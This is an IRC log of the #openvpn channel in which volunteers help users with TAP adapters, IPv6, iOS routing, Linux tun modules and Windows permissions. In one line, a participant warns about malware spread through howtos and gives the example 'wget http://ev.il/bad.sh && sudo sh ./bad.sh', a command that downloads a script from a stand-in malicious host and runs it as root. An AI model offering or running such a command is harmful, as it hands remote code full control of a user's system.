HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318} then Look through each sub-key for one with a DriverDesc = TAP-Win32Adapter V8 . Set Characteristics = 0x89 or (#2) To show again, set it to 0x81 13:49 <+pekster> Apparenlty the secret mask value is 0x08 13:50 < rob0> Wintafide? 13:51 <@krzee> im winterfied out here in usa right now 13:51 <@krzee> its collllllld 13:51 <+pekster> http://answers.microsoft.com/en-us/windows/forum/windows_xp-hardware/ethernet-and-wireless-nics-inoperative-can-not-be/fddb96a7-ec7a-453c-8566-41bf0738287e 13:51 <@vpnHelper> Title: Ethernet and Wireless NICs inoperative can not be - Microsoft Community (at answers.microsoft.com) 13:51 <+pekster> Ugh 13:51 < gedO> pekster: what is secret mask value? 13:51 <+pekster> Why does that OS have such stupid ways of doing and then (failing to) explain things? 13:52 <+pekster> gedO: Not only did I give you the XOR bitmask value, but I linked you to an article talking about it in great (great) detail 13:52 < rob0> It warmed up today in Dixieland, CSA! 13:52 <+pekster> Oh, and krzee linked the bot's reply with that same info 13:52 < gedO> pekster: Yes, I have that. But stange thing apeared 13:52 <@krzee> 5 legged dog? 13:53 < gedO> pekster: I can't add tap devices any more and I don't see any log at windows 8 13:54 < gedO> pekster: I have added 5 and then after soem time I want to add more 13:54 < gedO> and I get error 13:55 <+pekster> You need more than 5 adapters? 13:56 <+pekster> Normally you don't get logs when running addtap.bat. Just run the 'deltapall.bat' script and start over if you have that much of a mess 13:57 < gedO> pekster: okey, tahnak you 13:57 < BtbN> omg, if someone ever runs into this: the boolean net.ipv6.conf.eth0.accept_ra has 3 possible values. 0 disables ra, 1 enables it if not in forwarding mode, 2 force-enables it... 13:57 <+pekster> Do you really need 5+ tap devices? That sounds a lot like a misconfiguration to me 13:57 < holmen> pekster: just getting back to you. It works like a charm. Thank you for all you help and i'm sorry if hav ebeen a pain in the ass :S 13:57 < holmen> *:D 13:59 <+pekster> holmen: Just no more PMs that fall off the right-edge of my monitor. You do okay when you take the time to read the guides I link (sounds like the lartc guide got your multi-homing fixed, for instance) 13:59 <+pekster> If any of us take time to link it, it's probably worth reading (or we're one too many beers in. But usually the former) 14:03 < holmen> exit 14:03 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: leaving] 14:04 <+pekster> krzee: That virus sounds kinda nasty when it abused those flags like 'cannot remove device' in the registry. I'm sure glad Linux has no secret sysfs node that breaks modprobe -r for instance :\ 14:06 <@krzee> virus? 14:06 * krzee sneezes 14:07 <+pekster> That microsoft forum link I posted noted some virus that xor'd in 0x28 to that registry value which makes it hidden and non-removable (that's the 0x20 bit) 14:07 <+pekster> Why on earth would you want a bit in a registry that marks a devices as "non-removable"? It's so silly it's asking for a virus to flip it... 14:08 <+pekster> Erm, s/xor/or/. Time for more coffee 14:09 <@krzee> hahah nice 14:09 <@krzee> kinda like the lil dir that autoexecuted scripts that nobody knew about until that one gov virus used it 14:10 <@krzee> that one that used like 8 0day together, cant remember the name but it was the gov one before flame that shared code with flame 14:10 <+pekster> I give it less than 5 years before Linux "viruses" are distributed via howtos and bad-influiences that tell you to do 'wget http://ev.il/bad.sh && sudo sh ./bad.sh' 14:11 <@dazo> krzee: you probably missed this one ... http://i.imgur.com/h2JClux.jpg 14:11 <@dazo> (at least in this channel :-P) 14:12 <@krzee> hahahah 14:12 <@krzee> the murder rate has really been going down? 14:13 <@dazo> I dunno .... I hope it has :-P 14:19 -!- dazo is now known as dazo_afk 14:23 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 14:26 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has quit [] 14:33 -!- gedO [~quassel@213.226.181.200] has quit [Remote host closed the connection] 14:43 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 14:45 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 256 seconds] 14:46 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 14:50 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 15:11 -!- Orbi [~opera@anon-184-12.vpn.ipredator.se] has quit [Quit: Orbi] 15:23 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn 15:23 < Cubox> !ipv6 15:23 <@vpnHelper> "ipv6" is (#1) http://www.greenie.net/ipv6/openvpn.html for info about the ipv6 patch (adds nice ipv6 options to openvpn) or (#2) use 2.3 or see !snapshots for a release with ipv6 patches in it or (#3) http://ipstats.arvig.net/BraveHeartMEME.jpg 15:25 < rob0> oh, that factoid is starting to smell bad. 15:26 < Cubox> why ? 15:26 < Cubox> I need to find a cool ipv6 tutorial, because I'm a little lost... 15:26 < Cubox> for openvpn 15:27 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 15:27 -!- mode/#openvpn [+v s7r] by ChanServ 15:36 < rob0> Did you see the /topic yet? Look for "Current Release". 15:39 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 15:39 < Cubox> 2.3.0 15:39 < Cubox> so, full ipv6 support. 15:40 < rob0> no patch needed 15:40 <@krzee> hey 2.3.0 came out! 15:40 <@krzee> badass 15:40 < Cubox> I know ! 15:40 < Cubox> But, I still need confguration, right ? 15:41 <@krzee> yes 15:41 < Cubox> Or, if you tell me that openvpn guess everything, I will not beleive you. 15:41 < Cubox> krzee: so, where is the conf? :/ 15:41 <@krzee> forget about ipv6 and get a normal vpn up 15:41 <@krzee> then make the small mods needed for ipv6 15:41 < Cubox> I have a normal vpn up 15:42 < roentgen> Hi, I'm having some trouble with the ios client 15:42 <@krzee> then how can you say "where is the conf" ? 15:42 <@krzee> ios client got released too!?!? 15:42 <@krzee> holy shit how long have i been gone 15:42 < Cubox> krzee: I mean, it there a HOWTO for ipv6? 15:42 < roentgen> krzee: hmm.. yeah. some days ago 15:43 < roentgen> I can't ping the vpn server from the ipad even though the same config works on the android client 15:43 < roentgen> atually I can ping the vpn server only if I push redirect-gateway def1 15:43 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 15:44 <@krzee> can you see logs? 15:44 < roentgen> krzee: yes 15:45 <@krzee> post it 15:45 < roentgen> Cubox: tun-ipv6 in the server config 15:45 < Cubox> roentgen: thanks 15:46 < roentgen> Cubox: and "server-ipv6 an-ipv6-address" 15:46 <@krzee> the options are at: 15:46 <@krzee> !ipv6 15:46 <@vpnHelper> "ipv6" is (#1) http://www.greenie.net/ipv6/openvpn.html for info about the ipv6 patch (adds nice ipv6 options to openvpn) or (#2) use 2.3 or see !snapshots for a release with ipv6 patches in it or (#3) http://ipstats.arvig.net/BraveHeartMEME.jpg 15:46 <@krzee> first link 15:46 < Cubox> oh, thanks :) 15:46 <@krzee> may be updated a little, see manual for more up to date details 15:47 < roentgen> krzee: If I tell you that I have no idea how to copy stuff of an ipad? ;) 15:47 <@krzee> maybe theres a pastebin app or something 15:51 < roentgen> krzee: http://paste.kde.org/655052/ 15:52 < roentgen> now back to work to send a config with verb 5 to the ipad... tricky stuff 15:52 <@krzee> i just got my itouch out 15:52 <@krzee> hopefully my beta install is the same 15:54 <@krzee> wow, no logs from gui 15:55 < roentgen> krzee: on the ithing? 15:55 <@krzee> ya 15:55 <@krzee> crazy 15:55 < roentgen> click "status connected" 15:55 <@krzee> it needs to have some easy way for you to get me logs 15:56 <@krzee> so you cant ping 10.8.0.1? 15:56 < roentgen> nope... only with redirect-gateway def1 15:57 < roentgen> which would be fine if safari woudn't complain that is not connected to the internet 15:57 < roentgen> and would go open 10.8.0.1 as http 15:58 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]] 15:59 < roentgen> hmmm.... verb 5 is the same as verb 3 it seems 15:59 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:59 <@krzee> try just pushing a route to 10.8.0.0 255.255.255.0 from server 16:01 < rob0> nono. YOU push. I'll steer. 16:01 < roentgen> I think I did that with push 10.8.0.0/19 10.8.0.1 in a ccd 16:02 <@krzee> hey i cant ping either! 16:02 <@krzee> lemme fix mine then ill tell you wassup ;) 16:02 < roentgen> hah... I'm so glad now ;) 16:04 < roentgen> krzee: you might wanna talk to James Yonan for the 1.0.1 beta version 16:05 <@krzee> oh yes i can, its just 1-way 16:05 <@krzee> seems ios has some sort of firewall or something 16:05 <@krzee> server pings its vpn ip just fine 16:05 <@krzee> check if you have the same results 16:06 < roentgen> I can ping the client from the server yes, if that's what you mean 16:06 <@krzee> then its fine 16:07 <@krzee> i just accessed a website on an ip in the lan behind my server 16:07 <@krzee> from my itouch 16:09 <@krzee> so now we know your ping works 16:09 <@krzee> the webserver you are trying to reach, is it listening on 10.8.0.1? 16:09 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 16:18 < roentgen> krzee: sorry I was afk 16:19 < roentgen> yes apache is listening on 10.8.0.1 16:19 <@krzee> np 16:20 <@krzee> pastebin netstat -rn from the ipad 16:20 < roentgen> you know of good terminal app? 16:20 <@krzee> nope 16:20 < roentgen> I searched a whole day for one 16:20 <@krzee> i dont actually use my itouch 16:20 <@krzee> i just happen to have one, lol 16:21 < roentgen> and I could only find a ping/traceroute app 16:21 <@krzee> only has charge so i could listen to music if my other mp3 players die while traveling 16:21 <@krzee> has openvpn cause why the hell not! 16:21 < roentgen> so how do you do a netstat on it? 16:21 <@krzee> dont remember where i found netstat, but its there in cydia 16:22 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:22 <@krzee> adv-cmds 16:22 <@krzee> core utilities 16:22 <@krzee> core utilities (/bin) 16:22 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.4.0"] 16:22 <@krzee> debian utilities 16:23 <@krzee> inetutils 16:23 <@krzee> network-cmds 16:23 <@krzee> i think its in that one ^ 16:24 < roentgen> hmm... I just remembered that traceroute 10.8.0.1 went thru the local gateway 16:24 < roentgen> so I have a bigger problem than netstat 16:24 <@krzee> get netstat 16:24 <@krzee> its how i see your routes lol 16:27 < roentgen> krzee: hmm... cydia is for jailbroken devices 16:27 < roentgen> and mine it's not 16:28 <@krzee> oh right 16:28 < roentgen> I don't even own it 16:28 <@krzee> well figure out how to find your routing table 16:28 <@krzee> thats all im looking for 16:28 <@krzee> maybe try adding the route directly in your config file instead of pushing 16:29 <@krzee> maybe theres an issue with the routes being pushed, not sure why that sounds familiar 16:29 <@krzee> oh nope 16:29 <@krzee> my routes are being pushed 16:30 < roentgen> mine are also pushed as far as openvpn thinks 16:30 < roentgen> it's just that they seem to work 16:30 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out] 16:31 < roentgen> * not work ;) 16:31 -!- mdw [~mdw@81.171.97.152] has joined #openvpn 16:32 <@krzee> works here, i wish you had netstat 16:33 < roentgen> hmm... I wish there was a blank terminal in this thing 16:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:34 < roentgen> I guess I'll post a question on the mailing list... maybe they figure out something 16:35 <@krzee> https://discussions.apple.com/thread/3624745?start=0&tstart=0 16:35 <@vpnHelper> Title: routing table in iphone: Apple Support Communities (at discussions.apple.com) 16:35 <@krzee> there seems to be apps that can show you the routing table 16:42 < roentgen> as a guy in that thread put it: We're not gonna do any of that stuff, but we'll think about it. 16:43 <@krzee> "A more general App would be "iFinder" which gives you more info about the Networking." 16:44 <@krzee> There is a Free app for unjailbroken iPhone, I use, called "What is my MAC Address" not sure who makes it, but it was a free app last I saw, actually it's just called "MAC Address" by Bliss software. 16:44 <@krzee> maybe one of those have it 16:44 <@krzee> i cant see cause i dont have an apple login lol 16:44 <@krzee> well i have one but i dont use it 16:45 < roentgen> ifinder just shows yourself on the map and I got so angry I didn't search for the other one 16:45 <@krzee> lol 16:45 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:46 <@krzee> Someone squawked that is was a useless app, and you can get the info from Settings>General>About, but you CAN'T. Also, the app allows you to copy the info and email it to yourself or whatever you want. 16:46 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 276 seconds] 16:47 < roentgen> mac address shows only the mac and the ips 16:47 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 16:47 <@krzee> the app "system status" from technet costs $? 16:50 < roentgen> 1.79e but it's not my money ;) 16:50 -!- mdw [~mdw@81.171.97.152] has quit [Ping timeout: 276 seconds] 16:53 < roentgen> krzee: this is what I got with the said app http://paste.kde.org/655100/ 16:54 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 16:54 <@krzee> whats 10.8.31.37 16:55 < roentgen> my client vpn ip 16:55 < roentgen> 10.8.0.1 is the server with a /19 netmask 16:56 <@krzee> whats your openvpn config line for that? 16:56 <@krzee> for the pushed route 16:56 < roentgen> normally I don't push routes 16:56 < roentgen> I just use server 10.8.0.0 255.255.224.0 16:56 < roentgen> in the server config 16:56 <@krzee> why so big? 16:57 < roentgen> many clients.... ~1000 currently 16:57 <@krzee> ~1000 on 1 box? 16:57 < roentgen> on a busy day yes 16:57 <@krzee> …and its alive? 16:58 < roentgen> has no problems other than the connection being saturated by the udp traffic 16:58 <@krzee> wtf is your hw!? 16:58 <@krzee> ive heard of openvpn pegging its core ~250 clients 16:58 < roentgen> it's not hardware intensive as far as I see 16:59 <@krzee> no its not 16:59 <@krzee> but its single threaded and eventually just hits a limit 16:59 <@krzee> the openvpn process itself 16:59 < roentgen> 200 MB of ram and 10% cpu 16:59 <@krzee> whats the hardware? 16:59 <@krzee> blade? 16:59 <@krzee> lol 17:00 < roentgen> AMD Phenom(tm) 8650 Triple-Core Processor 17:00 <@krzee> how many mhz per core? 17:00 <@krzee> cause openvpn is only on 1 of them 17:00 <@krzee> ghz, sry 17:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 17:00 < roentgen> 1150.000 I guess... I forgot 17:01 < roentgen> that's what cpuinfo says 17:01 <@krzee> dmesg 17:01 < roentgen> it's gone with iptables traffic 17:01 <@krzee> ah 17:03 <@krzee> you're only trying to reach a webserver on the vpn server, right? 17:03 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 255 seconds] 17:04 < roentgen> krzee: yes 17:04 <@krzee> then try not pushing that lan route 17:04 <@krzee> just by connecting you get a route to the server 17:04 < roentgen> I didn't push any routes at first 17:05 <@krzee> which is working we know because the server can ping the client (and gets a response) 17:05 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 17:05 <@krzee> actually now that i think of it, if that is already true you dont need to change a thing 17:05 <@krzee> if ping works, the web connection should as well 17:06 < roentgen> ping works only with redirect-gateway 17:06 <@krzee> try tcpdump on the server tun device and see whats going on with the web connection 17:06 <@krzee> oh 17:06 <@krzee> try losing that /19 route 17:06 <@krzee> then tell me if the server can ping the clients vpn ip 17:07 < roentgen> yes the server and other clients can ping the ipad 17:07 < roentgen> the ipad client can't see anything 17:07 <@krzee> ok 17:08 <@krzee> now try the web connection while running tcpdump on the server sniffing for the client 17:08 <@krzee> my ipod touch cant ping my vpn server either but all other clients can 17:08 <@krzee> dunno why, just how it is, some sort of filter in there 17:08 <@krzee> your server needs to sniff its tun device 17:09 <@krzee> while you try to make the web connection to the server's vpn ip 17:09 < roentgen> I'm no tcpdump expert but on the ipad traceroute to the 10.8.0.1 goes through the local gateway 17:10 <@krzee> ipad is not your server 17:11 < roentgen> 10.8/19 on the ipad looks right to you? 17:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 17:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:18 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:19 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 17:19 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 17:21 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Ping timeout: 248 seconds] 17:27 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 276 seconds] 17:28 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 17:38 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 17:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:43 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Ping timeout: 255 seconds] 17:46 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Read error: Connection reset by peer] 18:38 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 252 seconds] 18:43 -!- brute11k [~brute11k@89.249.230.233] has joined #openvpn 18:47 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 18:49 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 18:49 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has left #openvpn [] 18:50 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 18:51 -!- mintuser [~mintuser@cpe-74-73-157-238.nyc.res.rr.com] has joined #openvpn 18:52 < zrzerenato> flushipnettable failed on interface using non-admin windows 7 account, i tryied already (www.openvpn.se) and some google but still not solved any one? 18:52 < mintuser> I am going crazy trying to get an openvpn client running using linuxmint. the latest error is Options error: You must define TUN/TAP device (--dev) but I have tried --dev tun on the command line and dev tun in the config file. 18:53 < mintuser> can anyone help me? 18:54 < mintuser> zrzerenato: is anyone around to help? 18:55 <@krzee> roentgen, no, but i havnt tried a /19 before 18:56 < mintuser> krzee: are you someone who could help? 18:56 <@krzee> but on a /8 /16 or /24 it simply leaves off the empty octets, so maybe its right 18:56 <@krzee> must be 19:00 < mintuser> I guess there is nobody to help. 19:00 <@krzee> roentgen, on the server 19:00 <@krzee> tcpdump -s0 -i tun0 port 80 19:00 <@krzee> then try to access from the client 19:00 <@krzee> !download 19:00 <@krzee> dont use openvpn.se thats WAY old 19:00 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 19:00 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 19:01 <@krzee> mintuser, the last part was for you 19:01 < mintuser> hmm vpnHelper sounds like somebody who would be able to help. Are you willing to try to help me vpnHelper ? 19:01 < mintuser> oh? 19:01 <@krzee> !bot 19:01 <@vpnHelper> "bot" is I'm a bot.. just a bot. krzee and ecrist are my maintainers, and I haven't said anything, if you'd notice, the person who spoke just before me gave a !command to make me speak :P 19:01 < mintuser> which part 19:02 < mintuser> I don't see anything that looks directed at me or my problem. 19:02 <@krzee> [16:59] !download 19:02 <@krzee> [16:59] dont use openvpn.se thats WAY old 19:02 <@krzee> [16:59] !download 19:02 <@krzee> [16:59] dont use openvpn.se thats WAY old 19:02 < mintuser> what is openvpn.se? 19:03 <@krzee> oops doublepaste 19:03 <@krzee> oops that was zrzerenato 19:03 <@krzee> do you have tun kernel module loaded? 19:03 < mintuser> used apt-get install from linuxmint 14, Nadia 19:03 < mintuser> yes. 19:03 <@krzee> that doesnt load the tun module into your kernel tho 19:04 <@krzee> try lsmod|grep tun 19:04 < mintuser> Wed Jan 23 18:56:02 2013 TUN/TAP device tun0 opened 19:04 < mintuser> Wed Jan 23 18:56:02 2013 TUN/TAP TX queue length set to 100 19:04 < mintuser> Wed Jan 23 18:56:02 2013 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0 19:04 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 248 seconds] 19:04 < mintuser> from output 19:05 < mintuser> oh 19:05 <@krzee> ahh ok 19:05 <@krzee> !logs 19:05 <@krzee> !configs 19:05 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 19:05 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 19:05 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Read error: Operation timed out] 19:06 < mintuser> not my client so I can't paste those 19:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 19:07 < mintuser> which logs, 19:07 < mintuser> I chucked my config file and have been using cli parameters 19:08 < mintuser> so I could change things faster 19:08 < mintuser> I have tried so many different things I don't know which to show 19:09 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 19:09 < mintuser> hmm nothing loaded into the kernel. hmmm 19:11 < mintuser> do I add mktun 19:12 < mintuser> no tun.ko, should I have one? 19:13 < mintuser> oh dear I am in over my head here 19:14 < zrzerenato> krzee didn´t get what u said ? 19:15 < zrzerenato> my server vpn is already installed and working perfectly. centos 6 with openvpn 19:15 <@krzee> right 19:16 <@krzee> dont use openvpn.se 19:16 <@krzee> !download 19:16 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 19:16 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 19:16 <@krzee> mintuser, you need to recompile your kernel with tun support, that is outside of openvpn 19:16 < mintuser> what is directed at me and what is for zrzerenato etc 19:16 < mintuser> oh no. I can't believe mintlinux kernel doesn't have tun support 19:16 < mintuser> linuxmint 19:17 <@krzee> i bet you need to compile it in 19:17 < mintuser> but everyone in #linuxmint says it is usable for openvpn with the default install. 19:17 < zrzerenato> all clients, are working good with adminisrator account , but the employes they use a (User Account) without admin previleges on Win7 , 19:18 < zrzerenato> and they cannot connect. 19:18 <@krzee> [17:06] not my client so I can't paste those 19:18 <@krzee> that means i cant help you 19:18 <@krzee> zrzerenato, that is correct, it requires admin 19:18 <@krzee> !win_noadmin 19:18 <@vpnHelper> "win_noadmin" is (#1) http://openvpn.se/files/howto/openvpn-howto_run_openvpn_as_nonadmin-Rev1.1.html for HowTo Run OpenVPN as a non-admin user in Windows or (#2) and http://article.gmane.org/gmane.network.openvpn.user/24873 for vista 19:18 <@krzee> you can try to figure out the win7 way 19:18 <@krzee> if you find it, ill add it to the bot 19:19 <@krzee> or you can set it to run automatically on those computers as a windows service 19:19 < zrzerenato> i tryied that already, but steel with same error msg . (flushipnettable failed on interface) 19:19 <@krzee> openvpn needs access to add routes and modify the network 19:19 <@krzee> without that access you'll have the problems you're having 19:20 < zrzerenato> yeap. agreed 19:20 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 19:20 < zrzerenato> and i set on admin account previlleges for (Users Account) to run Openvpn as Administrator 19:21 < zrzerenato> and it execute and connect, but i cannot ping, or access the network tunnel 19:22 <@krzee> did you install from http://openvpn.net/index.php/download/community-downloads.html ? 19:22 <@vpnHelper> Title: Community Downloads (at openvpn.net) 19:23 -!- AsadH is now known as zz_AsadH 19:23 < zrzerenato> krzee yes 19:24 < zrzerenato> krzee 2.3.0 and 2.2.2 versions 19:26 <@krzee> ok 19:26 <@krzee> on the desktop 19:26 <@krzee> right click and go to properties 19:26 <@krzee> then compatability mode 19:26 <@krzee> then run as admin 19:27 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Read error: Operation timed out] 19:30 < mintuser> oh sorry, I mean not my server. 19:30 < mintuser> of course it is my client 19:30 < zrzerenato> it run at both users (Admin) and (non-Admin). on (Admin) i can access the tunnel and ping my server, use remote apps, but with (non-Admin) it gives (flushipnettable failed on interface) ACCESS DENIED, but still looking like connected , but it is not routing correctly 19:30 < mintuser> and I can paste most information from the server as well just not the config file itself. 19:31 <@krzee> well for your problem i guess just client side is fine 19:31 <@krzee> zrzerenato, sounds right 19:31 <@krzee> i gave you some options 19:31 <@krzee> compatability mode - run as admin, or run it as a windows service in the background 19:32 <@krzee> and there should be another way the "windows way" but i dont know it 19:32 <@krzee> we only have it in the bot for xp and vista 19:32 -!- brute11k1 [~brute11k@89.249.230.232] has joined #openvpn 19:32 < zrzerenato> krzee sure u have mate .. appreciate when i fix-it i post-it 19:33 < zrzerenato> krzee cheers ! 19:33 <@krzee> cheers! 19:33 <@krzee> im using ospf to route to an ip over 2 ptp links (when 1 goes down it uses the other link), but now i need layer2 over the vpn. any ideas how i can make this work with failover? 19:35 -!- brute11k [~brute11k@89.249.230.233] has quit [Ping timeout: 276 seconds] 19:36 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 19:37 < zrzerenato> krzee sorry maybe next time. not very familiar 19:37 < zrzerenato> ;) 19:37 <@krzee> =] 19:38 < zrzerenato> see soon 19:38 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has left #openvpn [] 19:41 <@krzee> pekster, rob0 maybe any ideas? 19:42 <@krzee> or ecrist? 19:42 <@krzee> for some reason i feel like 2 bridges would create a whole lot of fubar 19:44 <@krzee> and the 2 machines that need to communicate over the failover link are windows machines so i cant use ptp tap on them and then run the ospf there 19:47 -!- raidz is now known as raidz_away 19:55 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 20:06 < mintuser> krzee is the only way to use tun devices to compile support into the kernel or sould something like insmod work if I could find a tun.ko which I haven't been able to do so far. 20:08 <@krzee> you can compile it as a module, the same way as compiling it in 20:11 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 245 seconds] 20:13 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 20:13 < mintuser> now if I could just find a tun.ko for linux mint 20:14 <@krzee> lol 20:14 <@krzee> you're doing it wrong 20:14 < mintuser> thjat is what I thought but someone here said to compile it. 20:14 <@krzee> [17:17] but everyone in #linuxmint says it is usable for openvpn with the default install. 20:14 <@krzee> \ 20:14 <@krzee> that would mean it has it 20:15 < mintuser> if you search on their forums for tun.ko vpn etc. it comes back saying "tun ko vpn being skipped search words must be at least 5 character long" 20:15 < mintuser> krzee: yes, that is what is so odd. 20:15 <@krzee> im done talking in circles, post the logs and configs like i said to an hour ago :-p 20:15 < mintuser> I have a vanilla default install of the latest Nadia (14) with kde. 20:16 < mintuser> and if I had seen an option wrt tun devices I definitely would have selected to include it. 20:16 < mintuser> which pastebin is preferred here? 20:16 <@krzee> whatev 20:16 < mintuser> sorry krzee I was off looking for a tun.ko 20:17 < mintuser> not even google helped, much less more standard routes. 20:17 <@krzee> cause thats not how it goes 20:19 < mintuser> was that for me krzee. I will be back again but right now the heat has gone out in my building and it is way way below freezing 20:19 <@krzee> [18:15] im done talking in circles, post the logs and configs like i said to an hour ago :-p 20:19 <@krzee> bye 20:19 < mintuser> I'm in the northeast us 20:19 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 20:20 < mintuser> 13 degrees and getting colder 20:20 < mintuser> my fingers can't type easily anymore 20:28 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has quit [Remote host closed the connection] 20:54 -!- guest061 [~yaaic@cpe-74-73-157-238.nyc.res.rr.com] has joined #openvpn 21:20 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn 21:21 < troker> Hey all, anyone know of a way to set up routing based off client in OpenVPN? AKA UserA can talk to 10.0.10.0/24 and UserB can talk to 10.0.10.2/32 21:24 <+pekster> krzee: tap-based failover? To the same peer, like device bonding? Or you mean different peers 21:25 <+pekster> troker: Routing, or do you mean firewalling? I suspect you don't really want different routing views for multiple VPN clients from the same VPN netwnork 21:28 < troker> pekster: I guess, but the firewall can't figure out what ip goes to what client? Can I make that a static setting? UserB get ip x.x.x.x and CAN NOT change it? 21:29 <+pekster> troker: Are we talking about issuing IPs to clients, or filtering where a connected client can forward traffic? What's your overall goal? 21:30 < troker> pekster: overall goal is UserA can talk to 10.0.10.0/24 and UserB can talk to 10.0.10.2/32 (single host) 21:31 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has joined #openvpn 21:31 < xbskid> So I fixed my issue from yesterday. 21:31 < troker> So per-client routing (OpenVPN routes from "fake" VPN network to real 'far-side' network) 21:31 < troker> routing/firewalling <- my confusion lies 